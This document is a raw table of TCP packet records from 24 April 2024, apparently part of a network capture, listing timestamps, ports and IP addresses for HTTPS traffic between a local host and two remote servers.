Apr 24, 2024 15:24:12.776170015 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.776320934 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.777152061 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.777170897 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.777179956 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.777184963 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.788141966 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.022845030 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023026943 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023078918 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.023101091 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023180008 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023235083 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.023240089 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023327112 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023382902 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.023387909 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023466110 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023544073 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023607969 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.023612976 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.023816109 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.026738882 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.027862072 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.027918100 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.027925014 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.029679060 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.029784918 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.029788971 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.029895067 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.029932976 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.029937983 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030038118 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030086994 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030091047 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030227900 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030270100 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030273914 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030391932 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030433893 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030437946 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030539989 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030586004 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030590057 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030685902 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030724049 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030728102 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030829906 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.030877113 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.030880928 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031039953 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031088114 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.031092882 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031411886 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031467915 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.031472921 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031555891 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031639099 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.031642914 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031667948 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.031706095 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.031749010 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032005072 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032084942 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.032089949 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032613039 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032676935 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.032680988 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032815933 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.032860994 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.032866001 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033135891 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033189058 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.033193111 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033462048 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033519030 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.033523083 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033673048 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.033727884 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.033732891 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.034531116 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.034571886 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.034576893 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.034792900 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.034833908 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.034838915 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.034997940 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.035056114 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.035059929 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.035645962 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.035820007 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.035824060 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.035912991 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.035959005 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.035964966 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.079951048 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.098743916 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.098896980 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.098957062 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.123806953 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.123821974 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.175307035 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.175388098 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.175415993 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176150084 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176201105 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.176211119 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176356077 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176397085 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.176402092 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176497936 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.176935911 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.176940918 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.177697897 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.177795887 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.177800894 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.178061962 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.178177118 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.178180933 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.180205107 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.180253029 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.180258036 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.180295944 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.182437897 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.182682991 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.182740927 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.182746887 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.182790041 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.182792902 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.182945967 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.182993889 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.182998896 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184190989 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184252024 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.184257030 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184376955 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184436083 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.184441090 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184659004 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184715033 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.184720039 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184896946 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.184940100 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.184943914 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185100079 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185139894 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.185143948 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185364962 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185410023 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.185415030 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185803890 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.185843945 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.185847998 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.186068058 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.186249971 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.186254978 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.186778069 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.186907053 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.186911106 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.187043905 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.187082052 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.187087059 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.187506914 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.187565088 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.187571049 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.187699080 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.188294888 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.188359022 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.188385963 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.188596010 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.188601017 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189218998 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189270020 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.189275026 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189481020 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189625025 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189665079 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.189670086 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.189703941 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.189707994 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.231159925 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.231184959 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.277316093 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.328025103 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328105927 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.328121901 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328175068 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328675032 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328735113 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.328739882 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328797102 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328841925 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.328847885 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328933001 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.328977108 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.328982115 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.329154015 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.329193115 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.329196930 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.329235077 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.329238892 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.329332113 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.329406977 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.329411983 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330010891 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330082893 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330095053 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.330100060 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330132961 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.330144882 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330869913 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330928087 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.330934048 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.330981016 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.331022024 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.331027031 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.331669092 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.331765890 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.331770897 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.331919909 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.331969976 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.331974030 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332037926 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332137108 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.332142115 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332868099 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332926989 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.332930088 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332942963 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.332981110 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.332987070 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335376024 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335421085 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335452080 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.335458040 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335500002 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.335500956 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335511923 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.335542917 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.335550070 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.336141109 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.336201906 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.336205959 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.337706089 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.337778091 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.337783098 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.337909937 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.337954998 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.337960005 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339194059 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339251041 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.339257002 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339571953 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339615107 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.339622021 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339854002 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.339900017 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.339906931 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.340306044 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.340421915 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.340429068 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.340652943 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.340696096 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.340703011 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.340979099 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.341057062 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.341065884 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.341381073 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.341435909 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.341443062 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.341655016 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.341706038 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.341711998 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342005968 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342060089 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.342066050 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342427969 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342499018 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.342506886 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342708111 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342974901 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.342992067 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.342998981 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.343080044 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.343085051 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.343416929 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.343489885 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.343496084 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.343717098 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.343769073 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.343776941 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344010115 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344326973 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.344333887 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344568968 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344616890 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.344624043 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344849110 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.344901085 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.344907999 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345052958 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345101118 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.345108986 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345415115 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345462084 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.345469952 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345772028 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345812082 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345844030 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.345851898 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.345880032 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.348156929 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.348206043 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.348236084 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.348242998 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.348280907 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.350615025 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.350656033 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.350689888 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.350699902 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.350725889 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.350745916 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.353303909 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.353348970 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.353388071 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.353398085 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.353430986 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.353447914 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.355797052 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.355855942 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.355911016 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:13.355920076 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:13.355945110 CEST	49746	443	192.168.2.4	104.17.3.184
